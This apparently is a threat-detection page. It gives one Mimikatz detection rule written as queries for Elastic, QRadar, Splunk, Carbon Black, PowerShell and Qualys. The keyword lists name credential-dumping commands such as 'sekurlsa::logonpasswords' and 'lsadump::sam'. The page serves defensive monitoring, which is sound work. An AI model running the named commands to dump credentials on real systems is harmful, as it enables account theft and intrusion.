40
0

Regular Mimikatz Usage Detection Expression

40

This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups).

  • Elastic Query
event.message:(*mimikatz* OR *mimilib* OR *<3\ eo.oe* OR *eo.oe.kiwi* OR *privilege\:\:debug* OR *sekurlsa\:\:logonpasswords* OR *lsadump\:\:sam* OR *mimidrv.sys*)
  • QRadar AQL
SELECT UTF8(payload) as search_payload from events where (LOGSOURCETYPENAME(devicetype) ilike '%Microsoft Windows Security Event Log%' and (search_payload ilike '%mimikatz%' or search_payload ilike '%mimilib%' or search_payload ilike '%<3 eo.oe%' or search_payload ilike '%eo.oe.kiwi%' or search_payload ilike '%privilege::debug%' or search_payload ilike '%sekurlsa::logonpasswords%' or search_payload ilike '%lsadump::sam%' or search_payload ilike '%mimidrv.sys%'))
  • Splunk
("mimikatz" OR "mimilib" OR "<3 eo.oe" OR "eo.oe.kiwi" OR "privilege::debug" OR "sekurlsa::logonpasswords" OR "lsadump::sam" OR "mimidrv.sys")
  • EDR Carbon Black
(mimikatz OR mimilib OR <3 eo.oe OR eo.oe.kiwi OR privilege::debug OR sekurlsa::logonpasswords OR lsadump::sam OR mimidrv.sys)
  • Windows PowerShell
Get-WinEvent | where {($_.message -match "mimikatz" -or $_.message -match "mimilib" -or $_.message -match "<3 eo.oe" -or $_.message -match "eo.oe.kiwi" -or $_.message -match "privilege::debug" -or $_.message -match "sekurlsa::logonpasswords" -or $_.message -match "lsadump::sam" -or $_.message -match "mimidrv.sys") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
  • Qualys
(mimikatz or mimilib or <3 eo.oe or eo.oe.kiwi or privilege::debug or sekurlsa::logonpasswords or lsadump::sam or mimidrv.sys)

Leave a Reply

Your email address will not be published.